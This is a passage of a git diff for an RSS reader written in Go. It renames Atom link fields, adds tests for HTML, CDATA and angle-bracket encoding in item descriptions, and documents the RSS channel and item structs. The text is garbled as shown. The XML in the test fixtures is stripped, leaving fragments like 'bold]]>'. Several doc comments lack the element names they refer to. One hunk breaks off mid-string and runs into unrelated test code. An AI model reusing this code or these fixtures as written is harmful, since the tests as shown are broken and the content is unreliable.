internal/reader/rss/rss.go | 144 +++++++++++++++++++++++------
4 files changed, 227 insertions(+), 64 deletions(-)
diff --git a/internal/reader/rss/adapter.go b/internal/reader/rss/adapter.go
index 2909fc6b..531cc53f 100644
--- a/internal/reader/rss/adapter.go
+++ b/internal/reader/rss/adapter.go
@@ -39,7 +39,7 @@ func (r *RSSAdapter) BuildFeed(feedURL string) *model.Feed {
// Try to find the feed URL from the Atom links.
for _, atomLink := range r.rss.Channel.AtomLinks.Links {
- atomLinkHref := strings.TrimSpace(atomLink.URL)
+ atomLinkHref := strings.TrimSpace(atomLink.Href)
if atomLinkHref != "" && atomLink.Rel == "self" {
if absoluteFeedURL, err := urllib.AbsoluteURL(feedURL, atomLinkHref); err == nil {
feed.FeedURL = absoluteFeedURL
@@ -170,8 +170,8 @@ func findEntryURL(rssItem *RSSItem) string {
}
for _, atomLink := range rssItem.AtomLinks.Links {
- if atomLink.URL != "" && (strings.EqualFold(atomLink.Rel, "alternate") || atomLink.Rel == "") {
- return strings.TrimSpace(atomLink.URL)
+ if atomLink.Href != "" && (strings.EqualFold(atomLink.Rel, "alternate") || atomLink.Rel == "") {
+ return strings.TrimSpace(atomLink.Href)
}
}
@@ -233,8 +233,8 @@ func findEntryAuthor(rssItem *RSSItem) string {
author = rssItem.ItunesAuthor
case rssItem.DublinCoreCreator != "":
author = rssItem.DublinCoreCreator
- case rssItem.AtomAuthor.String() != "":
- author = rssItem.AtomAuthor.String()
+ case rssItem.AtomAuthor.PersonName() != "":
+ author = rssItem.AtomAuthor.PersonName()
case strings.Contains(rssItem.Author.Inner, "
+
+
+ Example
+ http://example.org/
+
+ Item 1
+ http://example.org/item1
+ this is <b>bold</b>
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Entries[0].Content != `this is bold` {
+ t.Errorf("Incorrect entry content, got: %q", feed.Entries[0].Content)
+ }
+}
+
+// https://www.rssboard.org/rss-encoding-examples
+func TestParseEntryWithDescriptionWithHTMLCDATA(t *testing.T) {
+ data := `
+
+
+ Example
+ http://example.org/
+
+ Item 1
+ http://example.org/item1
+ bold]]>
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Entries[0].Content != `this is bold` {
+ t.Errorf("Incorrect entry content, got: %q", feed.Entries[0].Content)
+ }
+}
+
+// https://www.rssboard.org/rss-encoding-examples
+func TestParseEntryDescriptionWithEncodingAngleBracketsInText(t *testing.T) {
+ data := `
+
+
+ Example
+ http://example.org/
+
+ Item 1
+ http://example.org/item1
+ 5 < 8, ticker symbol <BIGCO>
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Entries[0].Content != `5 < 8, ticker symbol <BIGCO>` {
+ t.Errorf("Incorrect entry content, got: %q", feed.Entries[0].Content)
+ }
+}
+
+// https://www.rssboard.org/rss-encoding-examples
+func TestParseEntryDescriptionWithEncodingAngleBracketsWithinCDATASection(t *testing.T) {
+ data := `
+
+
+ Example
+ http://example.org/
+
+ Item 1
+ http://example.org/item1
+
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Entries[0].Content != `5 < 8, ticker symbol <BIGCO>` {
+ t.Errorf("Incorrect entry content, got: %q", feed.Entries[0].Content)
+ }
+}
+
func TestParseEntryWithFeedBurnerLink(t *testing.T) {
data := `
diff --git a/internal/reader/rss/rss.go b/internal/reader/rss/rss.go
index 7935166d..bc99b461 100644
--- a/internal/reader/rss/rss.go
+++ b/internal/reader/rss/rss.go
@@ -16,29 +16,75 @@ import (
// Specs: https://www.rssboard.org/rss-specification
type RSS struct {
- Version string `xml:"rss version,attr"`
+ // Version is the version of the RSS specification.
+ Version string `xml:"rss version,attr"`
+
+ // Channel is the main container for the RSS feed.
Channel RSSChannel `xml:"rss channel"`
}
type RSSChannel struct {
- Title string `xml:"rss title"`
- Link string `xml:"rss link"`
- Description string `xml:"rss description"`
- Language string `xml:"rss language"`
- Copyright string `xml:"rss copyRight"`
- ManagingEditor string `xml:"rss managingEditor"`
- Webmaster string `xml:"rss webMaster"`
- PubDate string `xml:"rss pubDate"`
- LastBuildDate string `xml:"rss lastBuildDate"`
- Categories []string `xml:"rss category"`
- Generator string `xml:"rss generator"`
- Docs string `xml:"rss docs"`
- Cloud *RSSCloud `xml:"rss cloud"`
- Image *RSSImage `xml:"rss image"`
- TTL string `xml:"rss ttl"`
- SkipHours []string `xml:"rss skipHours>hour"`
- SkipDays []string `xml:"rss skipDays>day"`
- Items []RSSItem `xml:"rss item"`
+ // Title is the name of the channel.
+ Title string `xml:"rss title"`
+
+ // Link is the URL to the HTML website corresponding to the channel.
+ Link string `xml:"rss link"`
+
+ // Description is a phrase or sentence describing the channel.
+ Description string `xml:"rss description"`
+
+ // Language is the language the channel is written in.
+ // A list of allowable values for this element, as provided by Netscape, is here: https://www.rssboard.org/rss-language-codes.
+ // You may also use values defined by the W3C: https://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes.
+ Language string `xml:"rss language"`
+
+ // Copyright is a string indicating the copyright.
+ Copyright string `xml:"rss copyRight"`
+
+ // ManagingEditor is the email address for the person responsible for editorial content.
+ ManagingEditor string `xml:"rss managingEditor"`
+
+ // Webmaster is the email address for the person responsible for technical issues relating to the channel.
+ Webmaster string `xml:"rss webMaster"`
+
+ // PubDate is the publication date for the content in the channel.
+ // All date-times in RSS conform to the Date and Time Specification of RFC 822, with the exception that the year may be expressed with two characters or four characters (four preferred).
+ PubDate string `xml:"rss pubDate"`
+
+ // LastBuildDate is the last time the content of the channel changed.
+ LastBuildDate string `xml:"rss lastBuildDate"`
+
+ // Categories is a collection of categories to which the channel belongs.
+ Categories []string `xml:"rss category"`
+
+ // Generator is a string indicating the program used to generate the channel.
+ Generator string `xml:"rss generator"`
+
+ // Docs is a URL that points to the documentation for the format used in the RSS file.
+ DocumentationURL string `xml:"rss docs"`
+
+ // Cloud is a web service that supports the rssCloud interface which can be implemented in HTTP-POST, XML-RPC or SOAP 1.1.
+ Cloud *RSSCloud `xml:"rss cloud"`
+
+ // Image specifies a GIF, JPEG or PNG image that can be displayed with the channel.
+ Image *RSSImage `xml:"rss image"`
+
+ // TTL is a number of minutes that indicates how long a channel can be cached before refreshing from the source.
+ TTL string `xml:"rss ttl"`
+
+ // SkipHours is a hint for aggregators telling them which hours they can skip.
+ // An XML element that contains up to 24 sub-elements whose value is a number between 0 and 23,
+ // representing a time in GMT, when aggregators,
+ // if they support the feature, may not read the channel on hours listed in the skipHours element.
+ SkipHours []string `xml:"rss skipHours>hour"`
+
+ // SkipDays is a hint for aggregators telling them which days they can skip.
+ // An XML element that contains up to seven sub-elements whose value is Monday, Tuesday, Wednesday, Thursday, Friday, Saturday or Sunday.
+ SkipDays []string `xml:"rss skipDays>day"`
+
+ // Items is a collection of items.
+ Items []RSSItem `xml:"rss item"`
+
AtomLinks
itunes.ItunesChannelElement
googleplay.GooglePlayChannelElement
@@ -64,16 +110,56 @@ type RSSImage struct {
}
type RSSItem struct {
- Title string `xml:"rss title"`
- Link string `xml:"rss link"`
- Description string `xml:"rss description"`
- Author RSSAuthor `xml:"rss author"`
- Categories []string `xml:"rss category"`
- CommentsURL string `xml:"rss comments"`
- Enclosures []RSSEnclosure `xml:"rss enclosure"`
- GUID RSSGUID `xml:"rss guid"`
- PubDate string `xml:"rss pubDate"`
- Source RSSSource `xml:"rss source"`
+ // Title is the title of the item.
+ Title string `xml:"rss title"`
+
+ // Link is the URL of the item.
+ Link string `xml:"rss link"`
+
+ // Description is the item synopsis.
+ Description string `xml:"rss description"`
+
+ // Author is the email address of the author of the item.
+ Author RSSAuthor `xml:"rss author"`
+
+ // is an optional sub-element of .
+ // It has one optional attribute, domain, a string that identifies a categorization taxonomy.
+ Categories []string `xml:"rss category"`
+
+ // is an optional sub-element of .
+ // If present, it contains the URL of the comments page for the item.
+ CommentsURL string `xml:"rss comments"`
+
+ // is an optional sub-element of .
+ // It has three required attributes. url says where the enclosure is located,
+ // length says how big it is in bytes, and type says what its type is, a standard MIME type.
+ Enclosures []RSSEnclosure `xml:"rss enclosure"`
+
+ // is an optional sub-element of .
+ // It's a string that uniquely identifies the item.
+ // When present, an aggregator may choose to use this string to determine if an item is new.
+ //
+ // There are no rules for the syntax of a guid.
+ // Aggregators must view them as a string.
+ // It's up to the source of the feed to establish the uniqueness of the string.
+ //
+ // If the guid element has an attribute named isPermaLink with a value of true,
+ // the reader may assume that it is a permalink to the item, that is, a url that can be opened in a Web browser,
+ // that points to the full item described by the element.
+ //
+ // isPermaLink is optional, its default value is true.
+ // If its value is false, the guid may not be assumed to be a url, or a url to anything in particular.
+ GUID RSSGUID `xml:"rss guid"`
+
+ // is the publication date of the item.
+ // Its value is a string in RFC 822 format.
+ PubDate string `xml:"rss pubDate"`
+
+ //